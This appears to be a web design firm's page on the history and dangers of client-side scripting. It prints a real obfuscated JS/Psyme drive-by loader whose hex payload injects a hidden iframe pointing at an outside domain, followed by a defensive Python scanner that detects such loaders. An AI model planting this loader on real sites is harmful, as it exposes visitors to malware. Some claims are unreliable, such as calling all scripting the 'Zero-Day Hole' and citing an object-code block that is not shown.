Web Design & Engineering...


Web Design 1011:  Interoperability, Accessibility, Compliance, & Branding.    

A Brief History of Active/Dynamic Scripting

It's a Document Server, not an Application Server

Ever since the dawn of inter-computer communication, software manufacturers have dreamed of offering software as a service, or SAAS. Just imagine the profitability if, instead of paying US$500.00 for Microsoft Office, you paid US$100.00 per month to access it via the internet, or even US$10.00 every single time you opened one of the Office applications. The problem is that SAAS not only shares limited hardware and bandwidth resources amongst millions of users (making it very slow on even the fastest connections), but it also requires trust from those visitors who wish to use it.

Back in the 1970s, an operating system named Mod8 was given a peculiar feature. Master Mode, as this feature was known, was the imperative to execute all succeeding characters as application code once the control character that initiated Master Mode had been encountered. This would have allowed programs to launch from within documents and images held on a centralised server, making SAAS a realistic possibility more than three decades ago. The problem with this system is that it allowed a file that was expected to behave as a document to behave as an application, without any warning to the user. This created a very risky operating environment in which even the most innocent-looking file could hide a nasty surprise. Technicians at computer expos exploited this, and the feature was dropped.

In the 1990s, the mistakes of history were repeated with the proliferation of macros and Dynamic HTML based scripting that ran on the client computer rather than on the server. First we endured a plague of macro viruses that successfully stripped away the innocence of every proprietary Microsoft format except RTF. Then, after the world had come to trust web pages, came a new plague of viruses exploiting the Zero-Day Hole, as "dynamic" or "active" client-side scripting became known. Many viruses depend on a script in the email to launch the virus automatically when the email is opened (unless the user has disallowed all client-side scripting). Likewise, phishing (the counterfeiting of bank websites to steal account numbers and passwords) is only possible if client-side scripts are allowed to do the dirty work of hiding the true location of the site.

The threat from the Zero-Day Hole, as active and dynamic scripting has become known, is very real. According to statistics compiled by Grisoft, makers of AVG Anti-Virus, one in every thousand web pages is infected with drive-by virus loaders. To reinforce just how real this threat is, displayed below is the source code of a drive-by loader for the JavaScript infection "JS/Psyme", which we took from an infected site. The site had been hacked because the hosting provider failed to set a PHP tag filter that excluded files and content from other domains. Psyme also has a VBScript variant, and is propagated as simply as inserting code such as this into the web page source. If visitors do not have scripting (Java, VB, ActiveX, and .NET) turned off, it downloads and runs an embedded executable chosen by the offender.


<script>
// Helper 1: parseInt(s, 16). The radix is hidden behind a one-line function
// that returns 16, so the number 16 never appears next to parseInt.
function v47016518c6af9(v47016518c7a9a)
{
    function v47016518c8a38 () { return 16; }
    return (parseInt(v47016518c7a9a, v47016518c8a38()));
}

// Helper 2: hex decoder. Walks the string two characters at a time and turns
// each pair into one character, rebuilding the real script from the hex blob.
function v47016518ca9a8(v47016518cbc18)
{
    function v47016518ce80a () { var v47016518cf7d1 = 2; return v47016518cf7d1; }
    var v47016518cc8ce = '';
    for (v47016518cd86d = 0; v47016518cd86d < v47016518cbc18.length; v47016518cd86d += v47016518ce80a()) {
        v47016518cc8ce += (String.fromCharCode(
            v47016518c6af9(
                v47016518cbc18.substr(v47016518cd86d, v47016518ce80a()))));
    }
    return v47016518cc8ce;
}

// The payload: a hex-encoded <script> block written straight into the page.
// Decoded, it calls document.write() to insert an iframe styled display:none
// that points at a domain under the offender's control, so the visitor sees
// nothing. (The hex is one unbroken literal in the original; it is split with
// + here only so the listing fits the page.)
document.write(
    v47016518ca9a8(
        '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F' +
        '63756D656E742E777269746528273C696672616D65206E616D653D312073726' +
        '33D5C27687474703A2F2F676F6F676C652D7374617469737469632E636F6D2F' +
        '696E2E6367693F323F272B4D6174682E726F756E64284D6174682E72616E646' +
        'F6D28292A3637373332292B2766333430623639655C272077696474683D3131' +
        '38206865696768743D353734207374796C653D5C27646973706C61793A206E6' +
        'F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>

This is the drive-by web page that loaded the virus JS/Psyme. This virus, or any other, can be loaded with JavaScript as shown above or with VBScript, and that is a compelling reason for your visitors to have all scripting disabled in their browser.


The object code for that executable can be seen in the last block of code. Script-based viruses such as this can also spread via email, because the email client also executes client-side scripts such as this one unless the operating system is instructed not to do so. This trojan horse is one reason why any savvy visitor to your site will have Java and other active scripting turned off.
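As an added example (not code from this page, nor from RealmEleven or the Psyme authors), the Python script below shows how a site owner or analyst can flag the shape of the loader listed above, whether it arrives in a web page or in an HTML email: a long hex literal pushed through a parseInt(..., 16) decoder into document.write(). The scanner decodes the literal the same way the loader does, reports whether the result is a hidden iframe and where it points, and so gives you the domain to block and the injected file to clean. The sample page is constructed for the example and uses the placeholder host malware-host.invalid; the names scan_page, decode_hex_literal and Finding are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List

# A long single-quoted literal made only of hex digits (plus any line breaks a
# formatter or the page layout may have wrapped it with).
HEX_LITERAL_RE = re.compile(r"'([0-9A-Fa-f\s]{40,})'")
# The decoder shape seen in the loader: parseInt(..., 16), sometimes with the
# radix hidden behind a tiny helper that just returns 16.
RADIX16_RE = re.compile(r"parseInt\s*\([^)]*,\s*16\s*\)|return\s*16\s*;")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc=\\?['\"]?([^'\"\s>\\]+)", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|\b(?:width|height)=\\?['\"]?[01]\b", re.I)
INJECTS_MARKUP_RE = re.compile(r"<(?:script|iframe|object|embed)\b", re.I)


@dataclass
class Finding:
    decoded: str                      # what document.write() would have injected
    radix16_decoder: bool             # page also carries a parseInt(..., 16) decoder
    iframe_srcs: List[str] = field(default_factory=list)
    hidden: bool = False              # iframe is display:none or 0/1 pixel


def decode_hex_literal(literal: str) -> str:
    """Join the wrapped literal and decode two hex digits per character,
    exactly as the loader's String.fromCharCode(parseInt(pair, 16)) loop does."""
    compact = re.sub(r"\s+", "", literal)
    if len(compact) % 2:              # truncated capture: drop the dangling nibble
        compact = compact[:-1]
    return bytes.fromhex(compact).decode("latin-1")


def scan_page(source: str) -> List[Finding]:
    """Return one Finding per hex literal that decodes to injectable markup."""
    has_decoder = RADIX16_RE.search(source) is not None
    findings = []
    for match in HEX_LITERAL_RE.finditer(source):
        decoded = decode_hex_literal(match.group(1))
        if not INJECTS_MARKUP_RE.search(decoded):
            continue                  # hex data that is not markup: not this pattern
        findings.append(Finding(
            decoded=decoded,
            radix16_decoder=has_decoder,
            iframe_srcs=IFRAME_SRC_RE.findall(decoded),
            hidden=HIDDEN_RE.search(decoded) is not None,
        ))
    return findings


# --- constructed sample, not the real infected page: same loader shape, placeholder host ---
INJECTED = ("<SCRIPT>document.write('<iframe name=1 src=\\'http://malware-host.invalid/in.cgi?2\\' "
            "width=1 height=1 style=\\'display: none\\'></iframe>')</SCRIPT>")
_hex = INJECTED.encode("ascii").hex().upper()
_wrapped = "\n".join(_hex[i:i + 60] for i in range(0, len(_hex), 60))   # mimic line wrapping
SAMPLE_PAGE = (
    "<html><body><p>Welcome</p>\n"
    "<script>function d(h){function r(){return 16;}return parseInt(h,r());}\n"
    "function u(s){var o='';for(i=0;i<s.length;i+=2){o+=String.fromCharCode(d(s.substr(i,2)));}return o;}\n"
    "document.write(u('" + _wrapped + "'));</script>\n"
    "</body></html>\n"
)
# A page with a short hex-looking string and no decoder: must produce no finding.
CLEAN_PAGE = "<html><body><script>var id='0badf00d';document.title='ok';</script></body></html>"

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        kind = "hidden iframe" if f.hidden else "iframe"
        print(kind, "->", f.iframe_srcs, "| parseInt(...,16) decoder present:", f.radix16_decoder)
    print("clean page findings:", scan_page(CLEAN_PAGE))
```

Run it over saved page sources or the HTML part of suspect emails; the decoded text tells you what the visitor's browser would have executed, and the iframe source gives you the host to block at the proxy and to search for across the rest of the site.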

This century, still intent on profit at the expense of the community and of consumer confidence, some of the large software corporations are pushing the idea of SAAS by attempting to redefine the web server as an "Application Server". SAAS is a viable business option, provided it is run strictly server-side. The "Application Server" model, however, is nothing more than an attempt to rename a very bad idea in the hope that this will wash away the atrocious track record of allowing applications to masquerade as documents.

While RealmEleven develops both software packages and web pages, we only offer downloadable, quarantinable software under honest, permanent licensing arrangements, and we do not develop SAAS or anything that attempts to access a visitor's computer without the visitor's express consent. Instead, RealmEleven offers world-class, high-profile online document systems unmatched for clarity and functionality.